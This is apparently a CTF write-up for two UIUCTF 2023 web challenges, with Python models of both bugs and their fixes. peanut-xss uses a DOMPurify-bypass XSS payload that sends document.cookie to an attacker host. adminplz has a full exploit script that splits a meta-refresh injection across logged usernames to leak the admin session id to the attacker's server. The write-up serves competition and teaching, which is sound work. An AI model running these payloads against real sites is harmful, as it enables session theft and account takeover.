UIUCTF2023 WEB WP

peanut-xss

An interesting XSS problem.

Looking at the site's code, our input HTML is first sanitized by DOMPurify, and the result is then rendered by Nutshell.

So let's look at the source code of Nutshell.

Around lines 615 and 622 of Nutshell we can spot the vulnerability.

If we put an HTML entity (e.g. &lt) into the link text, ex.innerText contains the decoded character <, because innerText returns the text content with character references already decoded.

That < is then passed unchanged into linkText, which is later appended into ex as markup rather than as text.

So the tag only comes into existence after DOMPurify has already run: the sanitizer saw harmless text, but the page inserts the decoded string as HTML. That gives us XSS, and we can grab the cookie.

<a>:&ltimg src=x onerror=fetch("https://vps/"+document.cookie)&gt</a>
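To make the bypass concrete, here is an added model of the sanitize, decode, reinsert flow (example code written for this writeup, not the challenge's or Nutshell's own code). The anchor text is decoded the way innerText decodes character references (Python's html.unescape, like a browser, accepts the legacy &lt form without a semicolon), then concatenated into markup. The payload above survives DOMPurify because it contains no raw tag; the tag only appears after decoding. The hardened variant escapes the decoded text again before it becomes markup. The SANITIZED string, the span wrapper and the helper names are assumptions for the example.

```python
import html
import re

# Constructed input: the attacker's anchor exactly as DOMPurify returns it.
# DOMPurify keeps the <a>, and the entity-encoded tag inside it is plain text
# to the sanitizer, so nothing is removed.
SANITIZED = '<a>:&ltimg src=x onerror=fetch("https://vps/"+document.cookie)&gt</a>'

# Helper names below are assumed; the real Nutshell code is not reproduced here.


def anchor_inner_text(fragment):
    """Model of el.innerText for a single <a>: its text content with character
    references decoded. html.unescape behaves like a browser here and accepts
    the legacy no-semicolon forms (&lt, &gt), which the payload relies on."""
    m = re.fullmatch(r"<a>(.*)</a>", fragment, re.S)
    if m is None:
        raise ValueError("expected a single <a>...</a> fragment")
    return html.unescape(m.group(1))


def render_vulnerable(fragment):
    """The pattern the writeup points at: the decoded text (the ':' trigger
    prefix stripped, an assumption) is concatenated into markup that ends up
    in innerHTML. Whatever the entities decoded to is now parsed as HTML."""
    link_text = anchor_inner_text(fragment).lstrip(":")
    return f'<span class="nutshell-link">{link_text}</span>'


def render_fixed(fragment):
    """Same flow, but the decoded text is escaped again before it becomes
    markup (equivalently: assign it through textContent, not innerHTML)."""
    link_text = anchor_inner_text(fragment).lstrip(":")
    return f'<span class="nutshell-link">{html.escape(link_text, quote=True)}</span>'


_TAG_RE = re.compile(r"<([a-zA-Z][\w-]*)")


def tag_names(markup):
    """Start tags an HTML parser would see in the markup (end tags ignored)."""
    return [t.lower() for t in _TAG_RE.findall(markup)]


if __name__ == "__main__":
    print("after DOMPurify  :", tag_names(SANITIZED))                       # ['a']
    print("decoded innerText:", anchor_inner_text(SANITIZED))
    print("vulnerable render:", tag_names(render_vulnerable(SANITIZED)))    # ['span', 'img']
    print("fixed render     :", tag_names(render_fixed(SANITIZED)))         # ['span']
```

The check that matters is the last two lines: the same DOMPurify-approved input yields an img tag with an onerror handler through the vulnerable path and only the wrapper span through the fixed one. Sanitizing once and then decoding and re-serializing is the general shape of this class of bug; any later step that turns text back into markup has to escape again.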

adminplz

What a nice problem.

Checking the source code, we notice that there is a log file.

Besides, our username and session id get written into that log, so we control part of its contents.

So the basic idea is to split a malicious payload across two usernames (e.g. <meta http-equiv="refresh" content="0; URL='VPS/?leak= and '">). Whatever the log records between the two logins, including the admin's session id, ends up inside the meta refresh URL and is sent to our server when the admin views the log.

import time
import requests

baseurl = "https://inst-83397f672f438108.adminplz.chal.uiuc.tf/"

# Step 1: log in with the first half of the payload as the username. The
# username is written verbatim into the log, opening a <meta refresh> whose
# URL is left unterminated.
res = requests.post(baseurl + "login", data={"username": "<meta http-equiv=\"refresh\" content=\"0; URL='https://vps/?leak=", "password": "1"})
print(res.text)
cookies = res.cookies  # session cookie issued at login, reused for the following requests

res = requests.get(baseurl + "admin?view=flag", cookies=cookies)
print(res.text)

# Ask the admin bot to visit a page, so that its own session gets logged
# after our first line.
res = requests.post(baseurl + "report", data={"url": "http://127.0.0.1:8080/admin?view=file:///flag.html"}, cookies=cookies)
print(res.text)

print("Coffee Break!")
# Give the bot time to visit and be logged before we close the payload.
for i in range(305):
    time.sleep(1)

# Step 2: log in again with the second half, which closes the URL and the tag.
res = requests.post(baseurl + "login", data={"username": "'\">", "password": "1"})
print(res.text)
cookies = res.cookies

res = requests.get(baseurl + "admin?view=flag", cookies=cookies)
print(res.text)

# Step 3: have the bot open the log through the file:// viewer. The log is
# rendered as HTML, the meta refresh fires, and everything between the two
# halves (including the admin's session id) is sent to the VPS.
res = requests.post(baseurl + "report", data={"url": "http://127.0.0.1:8080/admin?view=file:///var/log/adminplz/latest.log"}, cookies=cookies)
print(res.text)

# With the leaked session id, the flag can be read directly:
# res = requests.get(baseurl + "admin?view=file:///flag.html", cookies={"JSESSIONID": "CBB67381DD7D3DD626E64DC0200BB3E1"})
#
# print(res.text)
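An added example (not part of the original writeup or the challenge code) modelling why the split username works. The log line format, the admin's session id and the way the file viewer wraps the file in a page are assumptions; the two username halves are the ones used in the script above. The first login line opens a meta refresh whose URL is left unterminated, the admin's entry lands in the middle, and the second login line closes it, so a browser that parses the log as HTML navigates to the VPS with the sandwiched text in the query string. Rendering the file with HTML escaping, the obvious fix, leaves no meta tag to act on.

```python
import html
import re

# The two username halves from the exploit script above.
PREFIX_USER = "<meta http-equiv=\"refresh\" content=\"0; URL='https://vps/?leak="
SUFFIX_USER = "'\">"

# Constructed: a plausible log layout and session ids. The real
# /var/log/adminplz/latest.log format is not shown in the writeup.
ADMIN_SID = "ADMIN0123456789ABCDEF"


def login_line(username, session_id):
    return f"[login] user={username} session={session_id}"


def build_log(entries):
    """Log file contents for a sequence of (username, session_id) logins."""
    return "".join(login_line(u, s) + "\n" for u, s in entries)


def render_log_as_html(log_text, escape_output):
    """Model of admin?view=file://...: the file body is served inside an HTML
    page (assumption). With escape_output=False, as in the challenge, the log
    lines are parsed as markup; with True they are displayed as text."""
    body = html.escape(log_text) if escape_output else log_text
    return f"<html><body><pre>{body}</pre></body></html>"


_META_RE = re.compile(r'''<meta\s+http-equiv="refresh"\s+content="0;\s*URL='([^']*)'"''')


def refresh_target(page):
    """URL a browser would navigate to on the first meta refresh, or None.
    Browsers strip ASCII tab/newline from a URL before parsing, so the line
    breaks between log entries do not break the redirect."""
    m = _META_RE.search(page)
    if m is None:
        return None
    return re.sub(r"[\t\r\n]", "", m.group(1))


def leaked_session_ids(url):
    """Attacker side: every session id carried in the leaked query string."""
    return re.findall(r"session=([A-Za-z0-9]+)", url)


def run(escape_output):
    # Order matters: the admin's login has to land between the two halves,
    # which is what the long wait in the script above is for.
    log = build_log([
        (PREFIX_USER, "ATTACKER0000000000000001"),
        ("admin", ADMIN_SID),
        (SUFFIX_USER, "ATTACKER0000000000000002"),
    ])
    return refresh_target(render_log_as_html(log, escape_output))


if __name__ == "__main__":
    url = run(escape_output=False)
    print("redirect to :", url)
    print("leaked ids  :", leaked_session_ids(url))
    print("with escape :", run(escape_output=True))   # None
```

Running it shows the VPS receiving a single GET whose leak parameter carries the admin's line wholesale; the attacker's own ids come along for free. The fixed rendering returns None for the redirect, which is the check worth adding to any file or log viewer: the content type and escaping of what you serve, not the file extension, decide whether the browser treats it as HTML.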

However, I still don't clearly understand why the <meta> tag can be parsed in a .log file.